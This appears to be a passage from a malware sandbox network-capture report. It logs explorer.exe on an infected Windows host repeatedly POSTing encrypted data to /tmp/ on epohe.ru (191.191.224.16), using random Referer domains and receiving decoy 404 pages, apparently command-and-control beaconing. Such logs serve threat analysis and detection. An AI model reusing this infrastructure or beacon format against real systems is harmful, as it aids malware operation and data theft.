Sep 1, 2024 18:27:27.973164082 CEST	175	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 4f 43 ce e2 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vuOC5_uxlS$'%7b`/M#H,v4HDL,\rXPI]
Sep 1, 2024 18:27:29.220155001 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:28 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	56148	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:29.228163958 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://keyrnfkvwmhnea.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 216 Host: epohe.ru
Sep 1, 2024 18:27:29.228178978 CEST	216	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 33 4e b1 f9 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu3No\AAM7V:37-:*ZR7I%tcB&[])yn`7^P@
Sep 1, 2024 18:27:30.489590883 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	56149	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:30.497847080 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iiljonexjcrmdmr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 339 Host: epohe.ru
Sep 1, 2024 18:27:30.497860909 CEST	339	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 74 14 b2 e0 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vutDSH\z *y;2"9,W<.[xydK$cm\\^JRxxL}N$JmEq,Mkp;E<
Sep 1, 2024 18:27:31.874779940 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:31 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	56150	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:31.971863985 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ohihtgeokdjeoq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: epohe.ru
Sep 1, 2024 18:27:31.971873999 CEST	311	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 32 36 b3 89 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu26kJeb8$K.b}s@e\|s?9S{#:+a!Ln1!O~R>BKL8\i,B,\\~BPo
Sep 1, 2024 18:27:33.231990099 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:32 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	56151	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:33.240026951 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://anncymmtliu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 307 Host: epohe.ru
Sep 1, 2024 18:27:33.240045071 CEST	307	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 60 00 fa ae Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu`PCrvME[VIoydE'3c]]_\1)CILF\24dHePAN+eajO&#P/fZd},hfWI/;
Sep 1, 2024 18:27:34.494791985 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	56152	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:34.534480095 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nfbvcbcncqhv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: epohe.ru
Sep 1, 2024 18:27:34.534503937 CEST	223	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 6c 36 c6 a1 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vul66s1NOJ-7EyW#F3b.0-O`TU#G6UG"\|Ym!NA*-~-fg
Sep 1, 2024 18:27:36.056380987 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	56153	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:36.064263105 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://satmkqimawvad.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: epohe.ru
Sep 1, 2024 18:27:36.064275026 CEST	150	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 21 49 ae 86 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu!I-sYQRe)cagZOi+pW2Mc4%(NNJv
Sep 1, 2024 18:27:37.409102917 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:37 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	56154	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:37.417047977 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://miyyqevbsjlggoqi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 209 Host: epohe.ru
Sep 1, 2024 18:27:37.417062044 CEST	209	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 2c 4e a6 89 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu,NvnXPjE\Pl87ZJm&;IzN+=a0[NFW]8t}n5l
Sep 1, 2024 18:27:38.657624006 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	56155	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:38.667730093 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wjbrpavmolinjj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 193 Host: epohe.ru
Sep 1, 2024 18:27:38.667751074 CEST	193	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 37 51 c7 ee Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu7QzeobMOw]AJz#H1$C9R*2Fg2_}F\EV
Sep 1, 2024 18:27:39.922529936 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	56156	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:39.930432081 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://npckjykexnsqtkej.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: epohe.ru
Sep 1, 2024 18:27:39.930464983 CEST	319	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 30 2f e4 fd Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu0/{:z3RS.(p:M@Ky7;TM'65OE r@y)0'"I#'dpPXNteu$>W$k
Sep 1, 2024 18:27:41.273844004 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	56157	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:41.281825066 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://erkclgyfkkojaq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 346 Host: epohe.ru
Sep 1, 2024 18:27:41.281848907 CEST	346	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 56 0c e6 e6 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vuVpiv ~gk$Gi@!b>JKc\|6hL TpFgk%sT:<T}D7<nbj@:p
Sep 1, 2024 18:27:42.526227951 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	56158	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:42.534487963 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ffhtwsclnkg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 209 Host: epohe.ru
Sep 1, 2024 18:27:42.534513950 CEST	209	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 3a 5b ad 96 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu:[\|RQdy4mTScAK"4MVDE4wFK97bPf^mlR~Ph9J*GJ%
